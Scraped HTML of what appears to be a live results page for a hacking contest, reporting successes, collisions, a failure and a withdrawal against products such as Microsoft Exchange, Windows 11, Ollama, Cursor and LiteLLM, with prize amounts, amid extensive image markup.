                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, Billy (@st424204), Bruce Chen (@bruce30262), Pan Zhenpeng (@Peterpan980927) &amp; Weiming Shi (@bestswngs) of STARLabs SG (@starlabs_sg) targeting NVIDIA Megatron Bridge used a bug that was previously known. They still earn $2,500 and 1 Master of Pwn point.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Alon Ben Tsur (@iamgweej), Yahav Azran (@_yahav) have withdrawn their entry for Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Orange Tsai (@orange_8361) of DEVCORE Research Team chained 3 bugs to achieve Remote Code Execution as SYSTEM on Microsoft Exchange, earning $200,000 and 20 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg" data-image-dimensions="800x600" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1000w" width="800" height="600" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> / <b data-preserve-html-node="true">COLLISON</b> - David Tae &amp; Louis Hur of Out Of Bounds targeted Ollama, hitting a one-vulnerability collision with a previous attempt and earning $28,000 and 3 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png" data-image-dimensions="4032x2268" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1000w" width="4032" height="2268" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Nguyen Thanh Dat (@rewhiles) of Viettel Cyber Security (@vcslab) could not get their exploit of Mozilla Firefox – Renderer Only working within the time allotted.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Cyrill Bannwart, Emanuele Barbeno, Yves Bieri, Lukasz D., Urs Mueller (@compasssecurity) of Compass Security exploited Cursor in the second round, earning $15,000 and 3 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Siyeon Wi used an integer overflow bug to escalate privileges on Microsoft Windows 11 in the fourth round, earning $7,500 and 3 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b>
/ 
<b data-preserve-html-node="true">COLLISON</b> - Byung Young Yi (@yibarrack) of Out Of Bounds targeted LiteLLM, hitting a one-vulnerability collision with a previous attempt and earning $17,750 and 3.75 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png" data-image-dimensions="5712x3213" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1000w" width="5712" height="3213" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Confirmed! 0xDACA (@0xDACA) &amp; Noam Trobishi (@NTrobishi) used a use-after-free bug to exploit NV Container Toolkit in the second round, earning $25,000 and 5 Master of Pwn points. </p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png" data-image-dimensions="450x800" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1000w" width="450" height="800" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
